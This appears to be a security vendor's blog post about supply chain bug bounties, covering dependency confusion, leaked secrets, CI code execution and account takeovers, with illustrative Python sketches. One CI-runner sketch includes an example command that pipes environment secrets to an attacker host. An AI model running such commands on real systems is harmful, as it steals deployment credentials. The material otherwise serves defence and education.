
How much would enterprises spend to be made aware of a single supply chain vulnerability?

TL;DR – A lot, as it turns out!

Bug bounties have taken the world by storm. Large corporations pay bug bounty hunters for vulnerabilities found in their environments as a matter of course, paving the way for smaller companies, which have also begun to understand the benefits of bug bounty programs.

The primary motivations driving organizations to set up bug bounty programs and to pay ethical hackers to find and report bugs are:

  • To secure their environments and prevent being forced to pay a large ransom to malicious attackers in the event of a breach
  • To preserve their reputation, which in many cases, such as with financial institutions, is just as important as (if not more important than) preventing financial loss, since clients may lose confidence in an institution's ability to protect their assets in the event of a data breach

As companies develop more sophisticated defenses, attackers are forced to become more creative in order to find new avenues of attack. Supply chain attacks have become the latest Software Development Life Cycle (SDLC) attack vector, as attackers have identified the supply chain as a weak, unprotected link in the engineering environment.

What is the software ‘supply chain’ and why is it being targeted?

The software supply chain consists of the components and processes involved in developing and delivering software as part of the SDLC, including code/artifact repositories, code build processes, and code testing and deployment systems. The supply chain is singled out for attack because it takes in code and configuration files and builds them by executing scripts and commands. A malicious actor who gains access to the build environment can therefore execute malicious code or obtain access to sensitive resources such as passwords and secrets, eventually reaching and impacting the production environment.

For detailed context around the most common attack vectors in the CI/CD ecosystem, refer to the “Top 10 CI/CD Security Risks” framework.

Supply chain attack vector and the bug bounty ecosystem

The goal of our research for this blog was to understand whether organizations with bug bounty programs are willing to invest in supply chain vulnerabilities as part of these programs. To find out, we analyzed public bug bounty reports from the HackerOne directory over the past two years.

The results of this analysis were unequivocal: even without visibility into private bug bounty reports, or reports outside of the HackerOne platform, we saw hundreds of reports, with bounties ranging from a few hundred dollars to several payouts of over $40,000(!).

In this blog we will examine the ways in which bug hunters and malicious actors alike target and attack the supply chain, and assess the value of vulnerabilities they discover for security-minded companies who understand the worth of this work.

Dependency confusion

At the beginning of 2021, Alex Birsan, a security researcher and bug hunter, found a weakness in the process used by package managers to download external third-party dependencies. Detailed information can be found in Alex’s blog, but for those who want a TL;DR: most package managers download resources from both publicly managed and private repositories. The problem arises when a package resides in both types of repositories. How does the package manager decide where to download the package from? What considerations are taken into account? You might think that the package manager would prefer the package in the private repository, but Alex found that package managers simply select the latest package version, without attaching any importance to the type of repository in which the package is found.

This behavior allows attackers to upload a later version of a package containing malicious code to the public repository, which may result in the package manager downloading the compromised version and allowing poisoned code to flow through the CI/CD pipeline into the production environment.
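
To make this concrete, here is a minimal, hypothetical sketch of "highest version wins" resolution. It is not the code of any real package manager, and the registry names, package name, and versions are made-up assumptions; it only illustrates the behavior described above (it assumes the third-party 'packaging' library is installed).

# Minimal sketch of "highest version wins" resolution, as described above.
# Registries, package names, and versions are made up for illustration.
from packaging.version import Version

def resolve(package, registries):
    """registries maps a registry name to {package_name: [available versions]}."""
    candidates = []
    for registry, index in registries.items():
        for version in index.get(package, []):
            candidates.append((Version(version), registry))
    # The highest version wins; whether the registry is private or public
    # is never taken into account.
    best_version, registry = max(candidates)
    return str(best_version), registry

registries = {
    "private-registry": {"acme-utils": ["1.2.0"]},           # legitimate internal package
    "public-registry":  {"acme-utils": ["1.2.0", "99.0.0"]}, # attacker-published higher version
}

print(resolve("acme-utils", registries))  # ('99.0.0', 'public-registry'), the malicious copy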

Shopify, Apple and PayPal each paid Alex $30,000 (!) for a ‘dependency confusion’ bug that he found in their systems! Why? Because they knew that this type of attack allowed him to execute malicious code and access their internal CI systems responsible for deploying code to production, including the permissions and access necessary to perform these actions.

Dependency confusion can also occur in areas other than standard package managers. For example, read how Kamil Vavra found a dependency confusion in the WordPress ecosystem based on Alex’s research, and was awarded for his efforts.

For more on dependency confusion attacks, see a blog I wrote on the subject.

Additional references

Access to the code base

Scanning all code...

Findings:
  controller.js
     javascript.sqli
        Detected SQL statement that is tainted by `event` object. This could lead to SQL injection

For a bug hunter, gaining access to a company’s code base is a dream come true. It allows them to perform a full source audit of the system instead of only a black-box assessment, providing insight into the system’s inner workings, the little tricks and bypasses that developers use, passwords committed by mistake into the code base, and, more generally, a wealth of information about the technologies used by the product.
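
As a rough illustration of the kind of pattern matching such a source audit relies on, here is a sketch that flags lines building SQL statements from request or event data, similar in spirit to the finding shown above. The file extension, path, and regular expression are illustrative assumptions, not the rules of any real scanner.

# Rough sketch: walk a cloned code base and flag lines that appear to build
# SQL statements from request/event data. Pattern and path are illustrative only.
import os
import re

SQLI_PATTERN = re.compile(
    r"""\b(SELECT|INSERT|UPDATE|DELETE)\b.*["']\s*\+\s*(event|req|request)\b""",
    re.IGNORECASE,
)

def scan(root):
    for dirpath, _, filenames in os.walk(root):
        for name in filenames:
            if not name.endswith(".js"):
                continue
            path = os.path.join(dirpath, name)
            with open(path, encoding="utf-8", errors="ignore") as handle:
                for lineno, line in enumerate(handle, start=1):
                    if SQLI_PATTERN.search(line):
                        print(f"{path}:{lineno}: SQL statement possibly tainted by user input")

scan("./cloned-repo")  # the path is an assumption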

Hackers will gladly take full advantage of access to a code base, but what they do with it depends on their motivation. Ethical hackers will use it to help a company identify and fix vulnerabilities, and may be rewarded for their efforts. Malicious hackers, on the other hand, will try to infiltrate the company’s systems further, seeking to gain a critical advantage over its defenses.

In 2021, Augusto Zanellato reviewed Shopify’s publicly available macOS application. He found that an “.env” file had been introduced (probably by mistake) during the automated CI/CD build process and included in the released package. The file contained a GitHub authentication token with permission to pull all repository data and modify files in the repository.

Shopify rewarded Augusto with $50,000 for his efforts.

Additional examples of leaked credentials that provided hackers access to internal code, along with the bounties awarded to those who found the vulnerabilities, include:

Secrets stored in public sources

In the previous section we showed how attackers can gain access to source code, but what if the code is already publicly accessible? Many companies use open source or publicly available code that is published on the internet and freely available without restriction. This could be public code/artifact repositories, or even mobile applications in the various app stores, which can be decompiled back to something close to their source code. Developers who continuously add code to these sources risk accidentally exposing secrets and confidential data to the public domain, where they are accessible to everyone.

We have encountered numerous instances of secrets found in an organization’s public repositories, leading to compromise of the entire organization. 

These public code and data sources are usually source control management systems such as GitHub, GitLab, and Bitbucket repositories, but secrets can also be found in continuous integration (CI) log files. For example, Ivan Vyshnevskyi (aka sainaen) found that a HackerOne employee’s GitHub personal access token was exposed in Travis CI build logs. HackerOne paid $2,000 for this particular disclosure.

In another example, a mobile app released to the Google Play Store included leaked sensitive credentials for the Cloudinary service. Sergey Toshin (aka bagipro) found a disclosure of all uploads to Cloudinary via a hardcoded API secret in an Android app, which he reported to Reverb; the company subsequently paid him $750. This breach did not directly affect the CI/CD ecosystem, but it could have been avoided by using secret scanning to check for sensitive information before publishing the app to the app store.
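
A minimal sketch of what such a pre-release secret scan could look like, assuming the decompiled app or build output is available on disk; the token patterns and the path below are illustrative examples, not an exhaustive or authoritative rule set.

# Minimal sketch of a pre-release secret scan over a build artifact or a
# decompiled app directory. Patterns are illustrative examples only.
import os
import re

SECRET_PATTERNS = {
    "github_token":   re.compile(r"gh[pousr]_[A-Za-z0-9]{36,}"),
    "cloudinary_url": re.compile(r"cloudinary://\d+:[A-Za-z0-9_-]+@\w+"),
    "generic_secret": re.compile(r"(api[_-]?secret|api[_-]?key)\s*[:=]\s*\S{16,}", re.IGNORECASE),
}

def scan_artifact(root):
    findings = []
    for dirpath, _, filenames in os.walk(root):
        for name in filenames:
            path = os.path.join(dirpath, name)
            try:
                text = open(path, encoding="utf-8", errors="ignore").read()
            except OSError:
                continue
            for label, pattern in SECRET_PATTERNS.items():
                if pattern.search(text):
                    findings.append((path, label))
    return findings

# Fail the release step if anything suspicious is found.
if scan_artifact("./decompiled-app"):  # the path is an assumption
    raise SystemExit("Potential secrets found, do not publish this build")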

Read a great blog on this subject by Tillson Galloway: https://tillsongalloway.com/finding-sensitive-information-on-github/index.html

Summing up, we found that companies paid between $100 and $15,000 per leaked secret, depending on its impact. For example, see the following cases:

Running code in CI systems

Arbitrary code execution in a CI system is highly dangerous and should be prevented at all costs.

In 2020, Alex Chapman showed how to exploit a vulnerability in the GitLab Runner’s parsing of a CI configuration file, which allowed an attacker to execute code in the underlying CI system and access various secrets and network environments. For his efforts, Alex received a bounty of $6,500 from GitLab.
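
To illustrate why this class of bug is so valuable, here is a simplified, hypothetical sketch of a naive CI runner; it is not GitLab Runner’s actual code, and the configuration, secret, and commands are made-up assumptions. The point is that script steps parsed from a pipeline configuration run in an environment that already holds deployment secrets, so whoever controls the parsed configuration controls those commands.

# Hypothetical sketch of a naive CI runner, for illustration only.
import os
import subprocess

def run_job(job_config, secrets):
    """job_config is a dict parsed from a CI configuration file."""
    env = {**os.environ, **secrets}  # deploy keys, registry tokens, cloud credentials...
    for step in job_config.get("script", []):
        # Every step runs with full access to the secrets above, so an attacker
        # who controls any part of the parsed configuration controls these commands.
        subprocess.run(step, shell=True, env=env, check=False)

run_job(
    # The second step is what an injected, attacker-controlled command could look like.
    {"script": ["make build", "env | curl -s -d @- https://attacker.example"]},
    {"DEPLOY_TOKEN": "s3cr3t"},  # made-up secret for illustration
)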

I have researched different avenues for executing code in the CI, such as executing code through tools running in the CI or attacking the package managers themselves (see also my video from securityfest), and have been rewarded with bounties for my efforts.

File upload mechanisms have become infamous for being susceptible to remote command execution. In 2017, Jobert Abma found a command injection through the GitLab import file feature. He reported the issue to GitLab and received a $2,000 bounty. In 2022, while researching import mechanisms, William Bowling discovered the ability to read any file in GitLab, a vulnerability that brought him a bounty of $29,500 (a good analysis can be found here). Later on, he found a decompression bug in the same area, for which he was rewarded with an additional bounty of $33,510!

GitLab understands the impact and importance of supply chain vulnerabilities, and the need to safeguard against them. Consequently, they reward research and generously compensate bounty hunters who detect bugs in their environment.

For more interesting reports see:

CI Account takeovers 

This last vector is a relatively new one that didn’t even exist when I began my bounty hunting career: SaaS account takeovers.

An account takeover attack refers to a situation where an attacker gains control of an account on a SaaS platform that previously belonged to someone else. This can happen when the attacker is able to take over orphaned resources, such as a username or domain that is no longer in use by its original owner.

So how can account takeovers happen in CI systems? Package managers and other tools running in CI systems retrieve assets from source code management systems. If a user deletes or renames their SCM account, for example a GitHub account or organization, an attacker can legally register the abandoned name and upload a malicious asset in its place. The same thing can happen in package management systems such as npm, Maven, and so on.
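
One way defenders can look for this exposure is sketched below, under the assumption that the third-party `requests` library is available; the dependency URLs are made-up examples. The idea is to take the GitHub owners referenced by your dependencies and check whether those accounts still exist, since a 404 means the name is free for anyone to re-register.

# Hedged sketch: check whether the GitHub owners referenced by dependency URLs
# still exist. A 404 from the public users API means the name can be re-registered.
import requests

dependency_sources = [
    "https://github.com/acme-team/build-scripts",        # made-up example
    "https://github.com/former-employee/internal-tooling" # made-up example
]

for url in dependency_sources:
    owner = url.split("github.com/")[1].split("/")[0]
    response = requests.get(f"https://api.github.com/users/{owner}", timeout=10)
    if response.status_code == 404:
        print(f"{owner}: account no longer exists, dependency is open to takeover")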

You can read more in this excellent article by Aviad Gershon and Elad Rapoport about attacking the supply chain through a simple rename.

Some examples include:

Key takeaways

Supply chain attack vectors are increasingly becoming a major area of focus for all involved parties: hackers, bounty hunters, and defenders. All of them understand the major consequences and potential damage of discovering or exploiting such a vector.

Organizations at all levels of maturity should consider how they wish to address this concern.

Detecting vulnerabilities through bug bounty programs is obviously a highly effective way to find high-impact, highly exploitable vulnerabilities.

However, as we have seen, many of these vulnerabilities could easily be prevented through simple analysis of system configuration and other essential CI/CD security measures and controls.

Learn more about how Cider Security assists organizations in adding the proper security measures along the software supply chain.

Happy bounty hunting to us all!
